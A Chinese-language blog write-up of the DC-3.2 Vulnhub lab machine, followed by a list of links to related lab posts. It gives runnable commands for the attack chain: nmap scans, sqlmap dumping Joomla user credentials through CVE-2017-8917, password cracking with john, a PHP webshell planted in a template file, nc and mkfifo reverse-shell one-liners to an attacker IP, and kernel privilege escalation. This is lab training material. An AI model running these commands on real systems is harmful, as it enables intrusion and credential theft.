DC-3.2靶機詳解

高人于斯發表於2024-08-03

DC-3.2

資訊蒐集

IP 探測

arp-scan -l
nmap -sn 192.168.179.0/24
netdiscover -r 192.168.179.0/24

目標及 ip 就為 192.168.179.134。

埠探測

nmap -sT --min-rate 10000 -p- 192.168.179.134

就開放了一個 80 埠

再來個詳細埠掃描和漏洞指令碼掃描

nmap -sT -sV -O -p80 192.168.179.134

nmap --script=vuln -p80 192.168.179.134

這個詳細埠掃描沒有什麼值得注意的。

漏洞指令碼掃描中值得注意的是給了個 cve，待會可以仔細看看。剩餘的就是一些 dos 和 csrf 了，dos 一般不考慮，還有就是列舉的路由。

網頁資訊蒐集

訪問 80 web 服務埠

有個登入框，進行弱口令爆破，發現不行。利用 wappalzyer 外掛可以看到 cms 為 joomla

去看看剛剛的 CVE-2017-8917，是個 sql 注入漏洞，可以利用 sqlmap 一把梭了。

漏洞利用

查資料庫

sqlmap -u "http://192.168.179.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --batch -p list[fullordering] --dbs
# --batch 啟用批處理模式，執行時將不再要求使用者進行任何互動，所有可能的提示都會使用預設選項進行處理
# -p 指定要進行注入測試的引數

查出了五個資料庫，繼續查 joomladb 的表

sqlmap -u "http://192.168.179.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --batch -p list[fullordering] -D joomladb --tables

直接看可疑的 #_users 表中的段名，

sqlmap -u "http://192.168.179.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --batch -p list[fullordering] -D joomladb -T #_users --columns

然後獲取賬號和密碼

sqlmap -u "http://192.168.179.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" -C "username,password" --dump

密碼是個 hash 密文，利用 john 進行爆破

得到密碼，去進行登入一波，

沒有什麼東西，剛剛的列舉路徑又後臺路徑，同樣進行登入

登入後進行功能點測試。

getshell

發現一處檔案修改點，把原本的 php 檔案中加入一句話

但是訪問路徑發現沒有該檔案，發現網站用的是 beez3 模板，

搜尋得到檔案路徑在路徑為 /templates/beez3/，訪問 http://192.168.179.134/templates/beez3/jsstrings.php

直接蟻劍連線，使用者為 www-data，需要提權（不能使用蟻劍提權，因為HTTP是瞬時協議，這邊正提權，那邊TCP四次揮手斷開連線了，不能持久連線，所以蟻劍的作用就在於上傳檔案來反彈shell。）

利用 nc 進行 shell 反彈

nc -e /bin/bash 192.168.179.130 2333

顯示 nc 沒有 -e 選項

換個其他的命令

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.16.100 2333>/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.179.130 2333>/tmp/f

反彈 shell 成功後，然後獲取互動式 shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

提權

先檢視系統核心

uname -a

然後檢視發行版本

lsb_release -a

看到 ubuntu 版本為 16.04，查詢相應漏洞

看到有對應的提權漏洞。檢視漏洞細節

在靶機 shell 下載 exp 檔案

然後就是照著執行裡面的指令碼就行了，最後獲得 flag

總結

cms 漏洞查詢，sql 注入
john 爆破密碼後臺登入
後臺修改檔案getshell
系統核心漏洞提權

dc-2靶機-超詳解
2024-04-04
【HTB系列】靶機Irked的滲透測試詳解
2021-02-23
【HTB系列】靶機Chaos的滲透測試詳解
2021-03-01
【HTB系列】靶機Access的滲透測試詳解
2021-02-21
【HTB系列】靶機Swagshop的滲透測試詳解
2021-03-03
知攻善防Web1應急靶機筆記--詳解
2024-08-08
Web筆記
靶機breakout
2024-03-09
基於pikachu靶場的水平越權詳解
2024-09-13
VulNyx - Ceres 靶機
2024-08-25
kali滲透綜合靶機(十一)--BSides-Vancouver靶機
2019-05-18
IDE
UA: Literally Vulnerable靶機
2021-05-16
BUUCTF靶機筆記
2024-03-11
筆記
靶機練習：Geisha
2024-04-12
靶機練習：PhotoGrapher
2024-04-12
dc-2靶機
2024-08-06
BossPlayersCTF靶機筆記
2024-08-08
筆記
SAR靶機筆記
2024-08-17
筆記
紅隊靶機實戰（2）
2020-06-06
Vulnhub實戰-rtemis靶機?
2022-01-04
vulnstack靶機實戰01
2020-12-07
Vulnhub實戰-FALL靶機?
2021-10-22
Vulnhub實戰-doubletrouble靶機?
2021-10-11
vulnhub靶機：dc-8
2024-03-15
vulnhub靶機：djinn2
2024-03-20
vulnhub靶機：djinn3
2024-03-25
Headless靶機筆記
2024-08-08
筆記
Lazysysadmin靶機筆記
2024-08-10
筆記
web類靶機暴力破解
2020-10-21
Web
應急響應靶機-3
2024-03-23
應急響應靶機-4
2024-03-25
Bulldog_2 靶機提權
2024-07-10
HTB-Permx靶機筆記
2024-08-11
筆記
紅日靶機(一) 筆記
2024-09-08
筆記
上傳靶機實戰之upload-labs解題
2021-06-03
Vulnhub實戰-Dockhole_2靶機?
2021-10-18
Vulnhub實戰-grotesque3靶機?
2021-10-21
Vulnhub實戰-DockHole_1靶機?
2021-10-15
靶機練習：sunset: midnight
2024-06-05